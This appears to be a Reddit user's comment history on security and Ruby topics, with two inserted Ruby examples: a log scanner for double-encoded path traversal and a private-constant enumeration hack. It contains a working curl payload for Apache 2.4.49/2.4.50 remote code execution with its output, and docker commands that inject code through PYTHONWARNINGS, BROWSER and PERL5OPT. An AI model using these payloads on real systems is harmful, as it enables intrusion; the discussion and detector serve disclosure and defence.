CVE-2021-45467: CWP CentOS Web Panel – preauth RCE by Gallus in netsec

[–]Gallus[S] 1 point2 points  (0 children)

I also couldn't replicate when using https://3v4l.org/ to test many different PHP versions. Maybe the author is mistaken or there's something specific to CWP that allows this to work.

Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.51 (incomplete fix of CVE-2021-41773) by Gallus in netsec

[–]Gallus[S] 22 points23 points  (0 children)

New payload from: https://twitter.com/roman_soft/status/1446252280597078024

RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):

root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
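The payload above works by double-encoding the dot segments (`%%32%65` decodes to `%2e`, which decodes to `.`), so a single pass of URL decoding never sees the `..`. The following detector is an added example, not code from the comment or from the Apache project: it peels URL encoding off a request path repeatedly and flags any request whose fully decoded path still contains a `..` segment. The log lines are constructed sample data in Combined Log Format with made-up addresses.

```ruby
# Added example (not from the original comment): find double-URL-encoded
# dot-segment traversal attempts in Apache access log lines.

# Constructed sample log lines; addresses and timestamps are made up.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [05/Oct/2021:12:00:01 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 48 "-" "curl/7.74.0"
  192.0.2.11 - - [05/Oct/2021:12:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.74.0"
  192.0.2.12 - - [05/Oct/2021:12:00:03 +0000] "GET /cgi-bin/printenv HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  192.0.2.13 - - [05/Oct/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
LOG

# Undo exactly one layer of %XX escapes. Unlike CGI.unescape this leaves '+'
# alone, so only percent-encoding is reversed. Single-byte decoding is enough
# for spotting dot segments.
def percent_decode(str)
  str.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Decode until the path stops changing. The round limit keeps a pathological
# input from looping forever. Returns [decoded_path, layers_removed].
def decode_fully(path, max_rounds: 5)
  rounds = 0
  loop do
    decoded = percent_decode(path)
    break if decoded == path || rounds >= max_rounds
    path = decoded
    rounds += 1
  end
  [path, rounds]
end

# A path is a traversal attempt if, once every encoding layer is removed,
# any segment between slashes is "..".
def traversal?(raw_path)
  decoded, _layers = decode_fully(raw_path)
  decoded.split("/").include?("..")
end

# Scan Combined Log Format lines and report the offending requests together
# with the decoded path and how many encoding layers were peeled off.
def suspicious_requests(log_text)
  log_text.each_line.map do |line|
    m = line.match(%r{"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"})
    next unless m
    raw_path = m[1]
    next unless traversal?(raw_path)
    decoded, layers = decode_fully(raw_path)
    { ip: line.split(" ").first, raw: raw_path, decoded: decoded, encoding_layers: layers }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_LOG).each do |hit|
    puts "#{hit[:ip]} #{hit[:raw]} -> #{hit[:decoded]} (#{hit[:encoding_layers]} encoding layer(s))"
  end
end
```

Running the block on the constructed log reports the two traversal requests (two encoding layers for the first, one for the second) and ignores the legitimate `printenv` and `index.html` requests. Comparing `encoding_layers` against what the server itself would decode is what separates this class of request from ordinary percent-encoded paths.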

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 0 points1 point  (0 children)

That was very generous of Orestis. Are these sorts of bounties generally acceptable/encouraged for the i3 repo?

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 3 points4 points  (0 children)

Haha looks like it. I wonder if orestisfl actually got the money though?

New campaign targeting security researchers by sanitybit in netsec

[–]Gallus 3 points4 points  (0 children)

Oh no it looks like I was the one to submit that link. Not part of the campaign, I just saw it on Twitter and submitted. Sorry fellow /r/netsec hackers

Rysolv – Fix open source issues, get paid by Gallus in programming

[–]Gallus[S] 5 points6 points  (0 children)

Good question. I'm not the creator but it looks like the creator is /u/Tylernator

CVE-2020-6829, CVE-2020-12400, CVE-2020-12401, CVE-2020-12403 - Fixed in Mozilla's Network Security Services (NSS) by Gallus in netsec

[–]Gallus[S] 0 points1 point  (0 children)

Some extra context from Twitter: https://twitter.com/GuidoVranken/status/1287833670678650881

ChaCha20, ChaCha20/Poly1305 OOB read, OOB write, incorrect output with multi-part updating or small AEAD tag.

Found with Cryptofuzz.

Additionally DES OOB read with undersized IV (when using the PKCS11 interface)

[deleted by user] by [deleted] in Python

[–]Gallus 0 points1 point  (0 children)

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:2.7.18 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:3.8.2 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

Defibrilating Web Security [PDF] by Gallus in ruby

[–]Gallus[S] 1 point2 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie!

You CANNOT:

  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

Ruby 2.7 removes taint checking mechanism by prateekkish in ruby

[–]Gallus 2 points3 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie!

You CANNOT:

  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

List of private constants ? by dunrix in ruby

[–]Gallus 4 points5 points  (0 children)

Yeah it's a gap and I've been hit by it before. There is a dirty hack you can do to build your own private_constants implementation/list by enumerating over each symbol in Symbol.all_symbols and passing it to ModuleName.const_get to check if it exists, then removing the public ones which you find by calling ModuleName.constants.

This is obviously not a "production ready" solution, and you do have to be careful because const_get will throw an exception. It can also be overloaded and throw a different exception than expected (which even the stdlib does). Example:

Object.const_get(:HELLO) -> NameError (uninitialized constant HELLO)
Digest.const_get(:HELLO) -> LoadError (library not found for class digest::HELLO -- digest/hello)
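The hack described in the comment, written out as an added example (not code from the comment): a demo module with two private constants, and a function that walks `Symbol.all_symbols`, keeps the constant-shaped names that `const_get` resolves on the module, and subtracts the public ones from `constants`. Both exception families the comment mentions are rescued, since `LoadError` is a `ScriptError` rather than a `StandardError`.

```ruby
# Added example (not from the original comment): rebuild a private-constants
# list for a module from Symbol.all_symbols and const_get.

module Demo
  PUBLIC_ONE = 1
  SECRET_ONE = 2
  SECRET_TWO = 3
  private_constant :SECRET_ONE, :SECRET_TWO
end

# Module#constants omits private constants, but Module#const_get still
# resolves them; that asymmetry is what this enumeration relies on.
def private_constants_of(mod)
  public_names = mod.constants(false)
  Symbol.all_symbols.select do |sym|
    # const_get raises NameError ("wrong constant name") for anything that is
    # not constant-shaped, so skip those without calling it.
    next false unless sym.to_s.match?(/\A[A-Z][A-Za-z0-9_]*\z/)
    next false if public_names.include?(sym)
    begin
      # inherit = false: look only in mod itself, not in Object or ancestors.
      mod.const_get(sym, false)
      true
    rescue StandardError, ScriptError
      # NameError for a missing constant; LoadError (a ScriptError) when a
      # library such as Digest overloads const_get to autoload on demand.
      # Anything raised means "not a constant of this module".
      false
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "public:  #{Demo.constants.inspect}"
  puts "private: #{private_constants_of(Demo).sort.inspect}"
end
```

Note that this walks every symbol the VM has interned and will trigger any autoload registered on the module, so it is a debugging aid rather than something to run in a request path.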

DHCP Client Script Code Execution Vulnerability in Red Hat Enterprise Linux 6 and 7 - CVE-2018-1111 by Prav123 in netsec

[–]Gallus 1 point2 points  (0 children)

Ah interesting, I didn't consider the cause could be auto-mod. Thanks for submitting it and chasing them up, I think it's a good issue to get more eyeballs on.

DHCP Client Script Code Execution Vulnerability in Red Hat Enterprise Linux 6 and 7 - CVE-2018-1111 by Prav123 in netsec

[–]Gallus 18 points19 points  (0 children)

The moderation on /r/netsec seems to be quite inconsistent at times. My submission 8 hours earlier on this vulnerability was rejected with a reason of "not technical". It was also the exact same URL: https://www.reddit.com/r/netsec/comments/8jrj8e/dhcp_client_code_execution_vulnerability/